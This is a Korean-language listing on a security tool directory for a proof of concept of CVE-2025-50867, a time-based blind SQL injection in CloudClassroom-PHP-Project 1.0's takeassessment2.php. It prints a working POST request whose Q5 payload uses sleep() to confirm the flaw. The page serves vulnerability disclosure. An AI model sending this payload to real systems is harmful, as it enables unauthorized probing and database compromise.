Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-50867 — CloudClassroom-PHP-Project 1.0의 takeassessment2.php 엔드포인트에 있는 시간 기반 블라인드 SQL 인젝션 취약점에 대한 개념 증명으로, 조작된 POST 요청을 통한 원격 악용을 시연합니다. | Kitploit
도구/GitHubGitHub/sacx-7/cve-2025-50867
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingDatabase Security
GitHubsacx-7/cve-2025-50867

CVE-2025-50867

CloudClassroom-PHP-Project 1.0의 takeassessment2.php 엔드포인트에 있는 시간 기반 블라인드 SQL 인젝션 취약점에 대한 개념 증명으로, 조작된 POST 요청을 통한 원격 악용을 시연합니다.

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CloudClassroom-PHP-Project 1.0의 takeassessment2.php 엔드포인트에 SQL Injection 취약점이 존재합니다. 이 취약점은 Q5 POST 매개변수가 별도의 정화 절차 없이 SQL 문에 직접 포함되어 발생합니다.


취약점 유형 :

SQL Injection


제품 공급업체 :

https://github.com/mathurvishal/CloudClassroom-PHP-Project


영향을 받는 제품 코드 베이스 :

https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0


영향을 받는 구성 요소 :

takeassessment2.php, Q5 POST 매개변수, SQL 쿼리 로직


공격 유형 : 원격

공격 벡터 :

이 취약점을 악용하기 위해 공격자는 Q5 매개변수에 SQL 처리 시간 지연을 유발하는 페이로드(블라인드 시간 기반 SQLi)를 포함한 악의적인 POST 요청을 /CloudClassroom-PHP-Project-master/takeassessment2.php에 전송합니다.

POST 요청:

POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= 이로 인해 응답에 6초의 지연이 발생하여 취약점이 확인됩니다.


참조 :

https://owasp.org/www-community/attacks/SQL_Injection


발견자 : saurabh solanki

Linkedin : https://www.linkedin.com/in/saurabh-b294b21aa/

도구 다운로드